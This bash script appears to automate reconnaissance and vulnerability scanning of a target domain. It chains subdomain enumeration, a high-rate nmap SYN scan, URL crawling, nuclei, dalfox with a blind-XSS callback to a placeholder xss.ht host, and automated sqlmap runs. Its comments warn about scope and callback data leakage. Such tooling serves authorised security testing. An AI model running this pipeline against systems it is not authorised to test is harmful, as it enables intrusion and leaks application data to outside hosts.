#!/bin/bash
#You need to build or add an XSS sink for getdalfox() - xss.ht is now defunct.
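echo -e "\e[33mSecure Solutions \e[32mRecon\e[31m Script\n"
# TODO (carried over from the original header): add new unfurl options.

# Working tree: one directory per tool under /root/auto. mkdir -p does nothing
# for a directory that already exists, so no existence test is needed.
# "mass" used to be tested for but never created (that branch created "asset"
# a second time), which left getmassdns and getcollect with nowhere to write.
for recon_dir in nuclei subhttp amass full httprobe asset mass nmap dalfox gospider; do
    mkdir -p "/root/auto/${recon_dir}"
done

# Resolver list handed to massdns with -r. It comes from the master branch of
# a third-party repository and is not pinned, so its content can change between
# runs; every DNS answer the later stages rely on comes from the servers it
# lists. Keep a reviewed copy in place if that matters for the engagement.
# The download goes to a temporary file first: "wget -O" creates its output
# file even when the transfer fails, and an empty list would otherwise be
# kept forever because the fetch is skipped once the list exists.
resolver_list=/root/auto/massdns/shortworking.txt
mkdir -p /root/auto/massdns
if [ ! -s "$resolver_list" ]; then
    if resolver_tmp=$(mktemp "${resolver_list}.XXXXXX") \
        && wget https://raw.githubusercontent.com/janmasarik/resolvers/master/resolvers.txt -O "$resolver_tmp" \
        && [ -s "$resolver_tmp" ]; then
        mv -- "$resolver_tmp" "$resolver_list"
    else
        if [ -n "$resolver_tmp" ]; then
            rm -f -- "$resolver_tmp"
        fi
        echo "resolver list download failed; $resolver_list is missing" >&2
    fi
fi

# sqlmap reads its URL list from sqli.txt; create an empty one on first setup.
if [ ! -d /root/auto/sqlmap ]; then
    mkdir -p /root/auto/sqlmap
    touch /root/auto/sqlmap/sqli.txt
fi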

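# "$1" (the target domain) is spliced into file names under /root/auto and
# into the command line of every tool below, and the script works as root.
# Refuse anything that is not a plain host name: empty, starting with "-" or
# "." (would be read as an option or a hidden/relative path), containing ".."
# or any character outside letters, digits, ".", "_" and "-".
if [[ -z "${1:-}" || "$1" == [-.]* || "$1" == *..* || "$1" == *[!A-Za-z0-9._-]* ]]; then
    printf 'usage: %s <domain>\n' "${0##*/}" >&2
    exit 2
fi

# Number of dot-separated labels in the target.
TLDcount=$(printf '%s\n' "$1" | awk -F'.' '{print NF}')

# TLD is the last label, BLD is everything before it, both lower-cased.
# For a single-label name both end up holding the whole name, which is what
# the cut-based version produced as well.
target_lc=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
TLD=${target_lc##*.}
BLD=${target_lc%.*}

echo -e "\e[92mRecon running, please. Whait..\n"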
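# Runs subfinder against the target and stores the names it reports.
# Arguments: $1 - target domain
# Writes:    /root/auto/subhttp/saida.txt (overwritten on every call)
getsubfinder(){
    local target=$1
    local out=/root/auto/subhttp/saida.txt

    # The file starts with a single empty line, as before; getcollect passes
    # the file to massdns unchanged.
    echo "" > "$out"
    # Quoted so the target is always exactly one argument to -d.
    subfinder -t 100 -d "$target" -silent >> "$out"
}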
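# Builds candidate names "<word>.<target>" from the word list and resolves
# them with massdns.
# Arguments: $1 - target domain
# Reads:     /root/auto/mass/all.txt (word list; not provisioned by this script),
#            /root/auto/massdns/shortworking.txt (resolvers)
# Writes:    /root/auto/mass/results.txt, /root/auto/mass/$1-results.txt
getmassdns(){
    local target=$1
    local mass_dir=/root/auto/mass
    local candidates=$mass_dir/results.txt
    local label

    # Keeps the function usable when the directory is not there yet.
    mkdir -p "$mass_dir"

    echo "" > "$candidates"
    # read -r keeps backslashes literal; printf with quoted arguments stops a
    # word-list entry such as "*" from being glob-expanded into file names.
    # The "|| [ -n ]" part keeps a last line that has no trailing newline.
    while read -r label || [ -n "$label" ]; do
        printf '%s.%s\n' "$label" "$target"
    done < "$mass_dir/all.txt" >> "$candidates"

    massdns -r /root/auto/massdns/shortworking.txt -t A -o L \
        -w "$mass_dir/${target}-results.txt" < "$candidates"
}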
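# Runs assetfinder against the target and stores the names it reports.
# Arguments: $1 - target domain
# Writes:    /root/auto/asset/finder.txt (overwritten on every call)
getassetfinder(){
    local target=$1
    local out=/root/auto/asset/finder.txt

    # The file starts with a single empty line, as before.
    echo "" > "$out"
    # Quoted so the target is always exactly one argument.
    assetfinder --subs-only "$target" >> "$out"
}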
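# Resolves the names found by subfinder and assetfinder, merges them with the
# word-list results and writes the combined, de-duplicated list.
# Arguments: $1 - target domain
# Reads:     /root/auto/subhttp/saida.txt, /root/auto/asset/finder.txt,
#            /root/auto/mass/$1-results.txt
# Writes:    /root/auto/mass/$1-results1.txt, /root/auto/mass/temp.txt,
#            /root/auto/full/$1-fullenumerate.txt
getcollect(){
    local target=$1
    local mass_dir=/root/auto/mass
    local merged=$mass_dir/temp.txt

    # Keeps the function usable when the directory is not there yet.
    mkdir -p "$mass_dir"

    cat /root/auto/subhttp/saida.txt /root/auto/asset/finder.txt \
        | massdns -r /root/auto/massdns/shortworking.txt -t A -o L \
            -w "$mass_dir/${target}-results1.txt"

    # Lower-case, de-duplicate and drop every line containing a literal "*"
    # (-F makes the asterisk explicit; the unanchored BRE '*' meant the same).
    cat "$mass_dir/${target}-results1.txt" "$mass_dir/${target}-results.txt" \
        | tr '[:upper:]' '[:lower:]' \
        | sort -u \
        | grep -vF '*' > "$merged"

    # temp.txt is already lower-cased and unique, so the full list is a copy.
    cp -- "$merged" "/root/auto/full/${target}-fullenumerate.txt"
}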
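# Finds which enumerated hosts answer on web ports. The method depends on how
# many lines /root/auto/mass/temp.txt holds:
#   fewer than 10000   - httprobe; host names go to $1-dnswopenports.txt
#   10000 to 300000    - nmap SYN scan of ports 80 and 443 over the full list
#   more than 300000   - no probing, the full list is copied as-is
# Arguments: $1 - target domain
# Writes:    /root/auto/httprobe/temp.txt, /root/auto/httprobe/$1-dnswopenports.txt,
#            or /root/auto/nmap/$1-Remote-Ports.{nmap,gnmap,xml}
getnmap(){
    local target=$1
    local resolved=/root/auto/mass/temp.txt
    local probe_raw=/root/auto/httprobe/temp.txt
    local full_list="/root/auto/full/${target}-fullenumerate.txt"
    local live_hosts="/root/auto/httprobe/${target}-dnswopenports.txt"
    local count=0

    # Empty a left-over probe file from an earlier run.
    if [ -f "$probe_raw" ]; then
        : > "$probe_raw"
    fi

    # A missing list counts as zero lines.
    if [ -f "$resolved" ]; then
        count=$(wc -l < "$resolved")
    fi

    if (( count < 10000 )); then
        cat "$resolved" | httprobe > "$probe_raw"
        # Field 3 of "scheme://host/..." is the host part.
        cut -d '/' -f 3 "$probe_raw" | sort -u > "$live_hosts"
    elif (( count <= 300000 )); then
        # The original second test also required count > 6001; that is always
        # true once the first test has failed, so only the upper bound remains.
        # --min-rate 65535 with one retry and a 100ms RTT cap sends at least
        # 65535 packets per second: expect dropped probes (open ports reported
        # as missing) and heavy load on the network path.
        nmap -sS -Pn -p 80,443 --max-retries 1 --dns-servers 1.1.1.1 \
            --max-rtt-timeout 100ms -iL "$full_list" --min-rate 65535 --open \
            -oA "/root/auto/nmap/${target}-Remote-Ports"
    else
        cp "$full_list" "$live_hosts"
    fi
}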
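# Collects archived and crawled URLs for the target and derives the input
# lists for the scanners from them.
# Globals:   TLD (read) - last label of the target, used to match the gospider
#            output files
# Arguments: $1 - target domain
# Reads:     /root/auto/nmap/$1-Remote-Ports.nmap (when present),
#            /root/auto/httprobe/$1-dnswopenports.txt
# Writes:    /root/auto/httprobe/$1-gau.txt, /root/auto/gospider/$1/,
#            /root/auto/dalfox/$1-gaubefore.txt, /root/auto/dalfox/$1-gaufinal.txt,
#            /root/auto/nuclei/$1-hostsfornuclei.txt
#
# Scope: the host filters below are substring matches. A URL that only
# mentions the target in its path or query, or a host name that merely
# contains it, also passes, so the resulting lists can include hosts that do
# not belong to the target. Review them before the scanner stages use them.
getwayback(){
    local target=$1
    local nmap_report="/root/auto/nmap/${target}-Remote-Ports.nmap"
    local live_hosts="/root/auto/httprobe/${target}-dnswopenports.txt"
    local gau_urls="/root/auto/httprobe/${target}-gau.txt"
    local spider_dir="/root/auto/gospider/${target}"
    local param_urls="/root/auto/dalfox/${target}-gaubefore.txt"
    local final_urls="/root/auto/dalfox/${target}-gaufinal.txt"
    # Static-asset filter; the expression itself is unchanged.
    local static_ext='.(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js$|js$\?)'

    # Hosts nmap reported (field 5 of "Nmap scan report for <host>").
    if [ -f "$nmap_report" ]; then
        grep 'Nmap scan report for' "$nmap_report" | cut -d ' ' -f 5 >> "$live_hosts"
    fi

    # NOTE(review): the provider list names "gau"; confirm it is a provider
    # the installed gau version accepts.
    if [ ! -f "$gau_urls" ]; then
        cat "$live_hosts" \
            | gau --subs --providers gau,commoncrawl,otx,urlscan --threads 100 >> "$gau_urls"
    fi

    # The output location is a directory (it is globbed as one below), so the
    # skip test uses -d; the earlier -f test could never match it and the
    # crawl was repeated on every call.
    # NOTE(review): the URL list is given on stdin and again after -r; check
    # the installed gospider's --help that one of the two is really read as
    # the list of sites.
    if [ ! -d "$spider_dir" ]; then
        cat "$gau_urls" \
            | gospider -t 150 --js --subs --sitemap --robots -r "$gau_urls" -d 4 -o "$spider_dir"
    fi

    # Crawled URLs with a query string, minus static assets. grep -F matches
    # the target literally, so its dots no longer stand for "any character".
    cat "$spider_dir"/*_"$TLD" \
        | cut -d ' ' -f 3 \
        | grep -iF -- "${target}/" \
        | grep "=" \
        | grep -Eiv "$static_ext" \
        | sort -u \
        | qsreplace -a > "$param_urls"

    # Archived URLs, same filters.
    cat "$gau_urls" \
        | grep "=" \
        | grep -Eiv "$static_ext" \
        | grep -F -- "$target" \
        | sort -u \
        | qsreplace -a >> "$param_urls"

    sort -u "$param_urls" > "$final_urls"

    # scheme://host of every remaining URL, for nuclei.
    cut -d '/' -f 1,2,3 "$final_urls" \
        | grep -iF -- "$target" \
        | sort -u > "/root/auto/nuclei/${target}-hostsfornuclei.txt"
}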
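# Runs nuclei over the host list produced by getwayback.
# Arguments: $1 - target domain
# Reads:     /root/auto/nuclei/$1-hostsfornuclei.txt
# Writes:    /root/auto/nuclei/$1-nuclei.txt
getnuclei(){
    local target=$1

    # -s takes one comma-separated value. With spaces after the commas the
    # shell passed "high,", "critical," and "unknown" as separate arguments.
    # All terminal output, errors included, is discarded; findings are only
    # in the -o file, so an empty file can also mean the run failed.
    nuclei -l "/root/auto/nuclei/${target}-hostsfornuclei.txt" -c 100 \
        -o "/root/auto/nuclei/${target}-nuclei.txt" \
        -s medium,high,critical,unknown &> /dev/null
}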
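# Feeds the parameterised URL list to dalfox in pipe mode.
# Arguments: $1 - target domain
# Reads:     /root/auto/dalfox/$1-gaufinal.txt
# Writes:    /root/auto/dalfox/$1-dalfoxout.txt
getdalfox(){
    local target=$1

    # The -b value is a placeholder host under xss.ht, which the note at the
    # top of this file calls defunct. Blind-payload callbacks carry data from
    # the tested application to whoever operates that host name, so it has to
    # be replaced with an endpoint the operator runs before this stage is used.
    cat "/root/auto/dalfox/${target}-gaufinal.txt" \
        | dalfox pipe -b https://NEED-TO-CREATE-XSS-SINK.xss.ht -w 130 \
            -o "/root/auto/dalfox/${target}-dalfoxout.txt" --skip-bav
}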

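# Selects candidate URLs with the "gf sqli" pattern and runs sqlmap on them.
# Arguments: $1 - target domain
# Reads:     /root/auto/dalfox/*-gaufinal.txt
# Writes:    /root/auto/sqlmap/sqli.txt and sqlmap's output under /root/auto/sqlmap/
getsqlmap(){
    local target=$1
    local candidates=/root/auto/sqlmap/sqli.txt

    # The glob reads the URL lists of every target processed so far, and the
    # filter is a substring match on "<target>/": a URL from another run that
    # only mentions the target in its path or query is selected too. Check
    # sqli.txt against the agreed scope before relying on this stage.
    # grep -F matches the target literally (dots are not wildcards).
    cat /root/auto/dalfox/*-gaufinal.txt \
        | gf sqli \
        | grep -iF -- "${target}/" > "$candidates"

    /usr/local/bin/sqlmap.py -o --threads 4 --batch --crawl=1 --random-agent \
        -m "$candidates" --output-dir=/root/auto/sqlmap/
}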

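# Pipeline driver. A stage is skipped when its output file for this target
# already exists, so a second run against the same target resumes instead of
# starting over. "$1" is quoted everywhere so it stays a single word in the
# file tests and a single argument to each stage.
if [ ! -f "/root/auto/mass/$1-results.txt" ]; then
    getmassdns "$1"
fi
if [ ! -f "/root/auto/full/$1-fullenumerate.txt" ]; then
    getsubfinder "$1"
    getassetfinder "$1"
    getcollect "$1"
fi
# getnmap writes the .nmap file only on its nmap branch, so for targets that
# take the httprobe or copy branch this stage runs again on every invocation.
if [ ! -f "/root/auto/nmap/$1-Remote-Ports.nmap" ]; then
    getnmap "$1"
fi
if [ ! -f "/root/auto/dalfox/$1-gaufinal.txt" ]; then
    getwayback "$1"
fi
# The three scanner stages have no skip test and run on every invocation.
getnuclei "$1"
getdalfox "$1"
getsqlmap "$1"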